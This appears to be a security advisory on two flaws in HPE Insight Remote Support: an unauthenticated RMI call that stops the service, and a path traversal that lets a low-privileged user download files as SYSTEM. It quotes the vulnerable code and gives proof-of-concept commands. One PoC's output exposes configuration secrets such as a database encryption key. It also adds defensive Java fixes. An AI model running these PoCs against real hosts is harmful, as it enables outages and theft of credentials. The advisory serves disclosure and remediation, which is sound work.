Multiple vulnerabilities exist in HPE Insight Remote Support 7.15.0.642.
stopHPRSMain Unauthenticated DoS (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
The com.hp.uca.hprsmain.HPRSMain class in hprsMain.jar exposes a remote method named stopHPRSMain:
public interface IHPRSMainRemote extends Remote {
    void stopHPRSMain() throws RemoteException;
    String getRunningProcessStatus() throws RemoteException;
}
[...]
public class HPRSMain extends UnicastRemoteObject implements IHPRSMain, IHPRSMainRemote {
    [...]
    public static void windowsRun() throws CanNotStartProcessException, CanNotStartMonitorException {
        if (!isHprsmainStopping) {
            RMIUtil.registerWithRMIService("hprsMain", instance);
    [...]
// com.hp.uca.rmi.RMIUtil
public class RMIUtil {
    private static IUCALogger logger = UCALogger.getInstance(RMIUtil.class);
    private static Registry registry;
    private static int rmiPort;
    private static long delay;
    private static boolean db = logger.isDebugEnabled();
    static {
        rmiPort = UCAConfiguration.geti(UCAConfigurationKeys.HPRSMAIN_RMI_PORT, 7909);
        delay = UCAConfiguration.geti(UCAConfigurationKeys.HPRSMAIN_RMI_DELAY, 1500);
        setRegistry();
    }
    private static synchronized void setRegistry() {
        try {
            logger.info("Starting RMI registry on port '{}'", Integer.valueOf(rmiPort));
            registry = LocateRegistry.createRegistry(rmiPort);
            logger.info("RMI registry started on port '{}'", Integer.valueOf(rmiPort));
            delay();
        } catch (Exception e) {
            logger.info("RMI start failure {}", e.getMessage(), db ? e : null);
            try {
                registry = LocateRegistry.getRegistry(rmiPort);
    [...]
    public static void registerWithRMIService(String rmiRegistryName, Remote instance) {
        logger.info("Preparing to register '{}' as a Remote object", rmiRegistryName);
        try {
            try {
                logger.info("Checking if '{}' is already registered", rmiRegistryName);
                if (null != registry.lookup(rmiRegistryName))
                    logger.error("Unexpected {} is already registered", rmiRegistryName);
            } catch (NotBoundException notBoundException) {}
            registry.rebind(rmiRegistryName, instance);
    [...]
An unauthenticated remote attacker can invoke the method to terminate processes spawned by the HPRSMAIN Windows service.
PoC:
// rmg available at <https://github.com/qtc-de/remote-method-guesser>
java -jar rmg-5.1.0-jar-with-dependencies.jar call <target-host> 7909 --bound-name hprsMain --signature 'void stopHPRSMain()' --show-response
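
The excerpt above creates the registry with `LocateRegistry.createRegistry(rmiPort)`, which listens on every interface. The following added example (not HPE's code and not part of the original advisory) shows one way to keep an RMI registry and its exported object reachable only from the local host; `ControlRemote`, `Control`, `LoopbackServerSockets` and the bound name `control` are hypothetical. It limits network reach only and adds no authentication for local callers.

```java
import java.io.IOException;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.rmi.Remote;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.RMIServerSocketFactory;
import java.rmi.server.UnicastRemoteObject;

public class LoopbackRmiDemo {
    // Hypothetical stand-in for IHPRSMainRemote (names here are assumptions).
    public interface ControlRemote extends Remote {
        String status() throws RemoteException;
    }
    static final class Control implements ControlRemote {
        @Override public String status() { return "running"; }
    }

    // Creates RMI listeners on the loopback interface only.
    static final class LoopbackServerSockets implements RMIServerSocketFactory {
        @Override
        public ServerSocket createServerSocket(int port) throws IOException {
            return new ServerSocket(port, 50, InetAddress.getLoopbackAddress());
        }
        // RMI compares factories when deciding whether endpoints are the same.
        @Override public boolean equals(Object o) { return o instanceof LoopbackServerSockets; }
        @Override public int hashCode() { return LoopbackServerSockets.class.hashCode(); }
    }

    public static void main(String[] args) throws Exception {
        int port = 7909; // default HPRSMAIN_RMI_PORT in the excerpt above
        // Stubs must advertise loopback, or local clients dial an external address.
        System.setProperty("java.rmi.server.hostname", "127.0.0.1");
        RMIServerSocketFactory ssf = new LoopbackServerSockets();
        // Registry listens on 127.0.0.1:<port> rather than on every interface.
        Registry registry = LocateRegistry.createRegistry(port, null, ssf);
        // The object's own listener (anonymous port) is loopback-only as well.
        Control impl = new Control();
        Remote stub = UnicastRemoteObject.exportObject(impl, 0, null, ssf);
        registry.rebind("control", stub);
        // A client on the same host can still look up and call the object.
        ControlRemote client = (ControlRemote) LocateRegistry.getRegistry("127.0.0.1", port).lookup("control");
        System.out.println("local call: " + client.status());

        UnicastRemoteObject.unexportObject(impl, true);
        UnicastRemoteObject.unexportObject(registry, true);
    }
}
```
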
DownloadAttachmentServlet Path Traversal Information Disclosure (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
A path traversal vulnerability exists in method com.hp.uca.ui.servlets.DownloadAttachmentServlet.checkIfArbitraryFile(). A low-privileged Windows user can exploit it to download restricted files under the security context of SYSTEM.
private boolean checkIfArbitraryFile(String path) {
    boolean result = true;
    File collectionOutputDir = FileLocator.getDynamicFile(UCAComponents.COLLECTION, "results");
    String collectionResultsPath = collectionOutputDir.getAbsolutePath();
    if (path != null && !path.isEmpty())
        // path traversal with: C:\ProgramData\HP\RS\DATA\collection\results\..\..\..\..\..\..\..\..\..\ProgramData\HP\RS\CONFIG\hprs.xml
        if (path.contains(collectionResultsPath))
            result = false;
    return result;
}
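
The check above passes any string that merely contains the results directory, so `..` segments after that prefix are never resolved. The following added example (not HPE's code and not part of the original advisory) puts that substring logic beside a hardened variant that resolves the path before comparing it; the class and method names and the temporary directory layout are constructed for illustration.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class AttachmentPathCheck {
    // Logic as shown in the advisory: substring match on the caller-supplied string.
    static boolean vulnerableIsArbitrary(String path, String resultsDir) {
        boolean result = true;
        if (path != null && !path.isEmpty() && path.contains(resultsDir)) {
            result = false;
        }
        return result;
    }

    // Hardened variant (added): resolve ".." and symbolic links first, then
    // compare whole path components against the resolved results directory.
    static boolean hardenedIsArbitrary(String path, Path resultsDir) {
        if (path == null || path.isEmpty()) {
            return true;
        }
        try {
            Path base = resultsDir.toRealPath();
            Path target = Paths.get(path).toRealPath();
            return !target.startsWith(base);
        } catch (IOException | InvalidPathException e) {
            return true; // fail closed: unresolvable paths count as arbitrary
        }
    }

    public static void main(String[] args) throws IOException {
        // Constructed layout mirroring DATA\collection\results and CONFIG\hprs.xml.
        Path root = Files.createTempDirectory("rs-demo");
        Path results = Files.createDirectories(root.resolve("DATA").resolve("collection").resolve("results"));
        Files.write(results.resolve("report.txt"), "ok".getBytes());
        Path config = Files.createDirectories(root.resolve("CONFIG"));
        Files.write(config.resolve("hprs.xml"), "secret".getBytes());

        String sep = java.io.File.separator;
        String legit = results + sep + "report.txt";
        String traversal = results + sep + ".." + sep + ".." + sep + ".." + sep + "CONFIG" + sep + "hprs.xml";

        System.out.println("substring check, report.txt arbitrary? " + vulnerableIsArbitrary(legit, results.toString()));
        System.out.println("substring check, traversal arbitrary?  " + vulnerableIsArbitrary(traversal, results.toString()));
        System.out.println("resolved check, report.txt arbitrary?  " + hardenedIsArbitrary(legit, results));
        System.out.println("resolved check, traversal arbitrary?   " + hardenedIsArbitrary(traversal, results));
    }
}
```

The substring check reports both paths as not arbitrary, while the resolved check flags only the traversal path.
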
The HPRSMAIN Jetty web application uses Windows credentials for authentication. It assigns the operator role to a non-administrative Windows user who successfully logs in to the web application:
// com.hp.uca.auth.UCAWindowsLoginModule.login()
public boolean login() throws LoginException {
    [...]
    String[] command = { this.executable, encrypt(this.userName), encrypt(this.password), "true" };
    if (logger.isDebugEnabled())
        showCommand(command);
    ProcessBuilder pb = new ProcessBuilder(command);
    pr = pb.start();
    BufferedReader input = new BufferedReader(new InputStreamReader(pr.getInputStream()));
    String line = null;
    while ((line = input.readLine()) != null) {
        if (this.isDebugEnabled)
            logger.debug(line);
        groups.add(line);
    }
    if (groups.contains("S-1-5-32-544") || isinAdminGroup(groups, this.userName)) {
        if (this.isDebugEnabled)
            logger.debug("#SecEvt : Administrators group passed");
        this.roles.add("administrator");
        this.roles.add("operator");
        this.groupName = "Administrators";
        this.isSuccess = true;
    } else if (groups.contains("S-1-5-32-547") && allowOperators) {
        if (this.isDebugEnabled)
            logger.debug("#SecEvt : Power Users group passed");
        this.roles.add("operator");
        this.groupName = "Power Users";
        this.isSuccess = true;
    } else if (groups.contains("S-1-5-32-545") && allowOperators) {
        if (this.isDebugEnabled)
            logger.debug("#SecEvt : Users group passed");
        this.roles.add("operator");
        this.groupName = "Users";
        this.isSuccess = true;
    }
    [...]
The operator role is assigned only if the "uca.allowauthuser" setting in hprs.xml is set to true:
boolean allowOperators = UCAConfiguration.isSet(UCAConfigurationKeys.ALLOW_AUTH_USERS);
// com.hp.uca.configuration.UCAConfigurationKeys
public enum UCAConfigurationKeys {
    [...]
    ALLOW_AUTH_USERS("uca.allowauthuser", null, UCAConfigurationKey.TYPE.GLOBAL, false),
    [...]
}
The web.xml for the Jetty web application allows users with the operator role to access various protected URLs, including the one to access the DownloadAttachmentServlet (/remotesupport/getattachment):
<servlet-mapping>
    <servlet-name>DownloadAttachmentServlet</servlet-name>
    <url-pattern>/remotesupport/getattachment</url-pattern>
</servlet-mapping>
[...]
<security-constraint>
    <web-resource-collection>
        <web-resource-name>Remote Support UI</web-resource-name>
        <url-pattern>/remotesupport/*</url-pattern>
    </web-resource-collection>
    <!-- force redirect to https.-->
    <user-data-constraint>
        <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
    <!-- Comment out this auth-constraint block to disable authentication -->
    <auth-constraint>
        <role-name>administrator</role-name>
        <role-name>operator</role-name>
    </auth-constraint>
</security-constraint>
[...]
The Jetty web application runs under the security context of SYSTEM. So if the "uca.allowauthuser" setting is set to true, a low-privileged Windows user can perform a path traversal (via the DownloadAttachmentServlet) to download a file (e.g., hprs.xml) that the user normally does not have access to.
PoC:
python3 hpe_irs_path_traversal.py -t <target-host> -u low-priv-user -p <password> -f '\\ProgramData\\HP\\RS\\CONFIG\\hprs.xml'
[*] Logging in as low-priv-user
[+] Login OK
[*] Performing path traversal: fetching C:\\ProgramData\\HP\\RS\\DATA\\collection\\results\\..\\..\\..\\..\\..\\..\\..\\..\\..\\ProgramData\\HP\\RS\\CONFIG\\hprs.xml
[+] Returned download link: https://<target-host>:7906/attachments/992c03e1-6051-41c8-b4b0-1d397fae6ee7.xml
[*] Fetching https://<target-host>:7906/attachments/992c03e1-6051-41c8-b4b0-1d397fae6ee7.xml
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE properties SYSTEM "http://java.sun.com/dtd/properties.dtd">
<properties>
<comment>Configuration saved at Thu Feb 06 00:17:22 EST 2025</comment>
<entry key="uca.allowauthuser">true</entry>
<entry key="hprsmain.db.old.su.password">0F971D0714C62FC2C3BB6AFA76B7859721CB29C6ACAD7C17A34C2BAB7D153410</entry>
<entry key="swm.package.url.server">https://api.support.hpe.com/v1</entry>
<entry key="uca.uuid">79fea801-ae5d-49b5-b3b6-aa434e59fd18</entry>
<entry key="listener.snmp4j.engineid">80:00:13:70:01:ac:1a:1c:6b:aa:68:5a:4c</entry>
<entry key="HpAdapter.Logging.Heartbeat">false</entry>
<entry key="uca.cliq.home">C:\\Program Files\\HP\\RS\\P4000\\</entry>
<entry key="uca.home">C:\\Program Files\\HP\\RS\\</entry>
<entry key="integration.adapters.emailadapter.collectionsent.suppressfor">Metrics_Collection</entry>
<entry key="hprsmain.db.encryption.key">198D16D8CFAE62FD19E55745DD27744C</entry>
<entry key="hprsmain.db.auth">md5</entry>
<entry key="hprsmain.db.hba.startup.ipv4.conf">host all all 127.0.0.1/32 trust</entry>
<entry key="backup.target">C:\\ProgramData\\HP\\RS\\DATA\\backup</entry>
<entry key="HpAdapter.Logging.EventSubmission">true</entry>
<entry key="hprsmain.db.hba.startup.ipv6.conf">host all all ::1/128 trust</entry>
<entry key="uca.home.ui">C:\\Program Files\\HP\\RS\\ui\\</entry>
<entry key="hprsmain.db.su.password">600502A039AB0D1F3A218763916A6069E07A9211FCA82BEDE1E65DB3CF284C72</entry>
[...]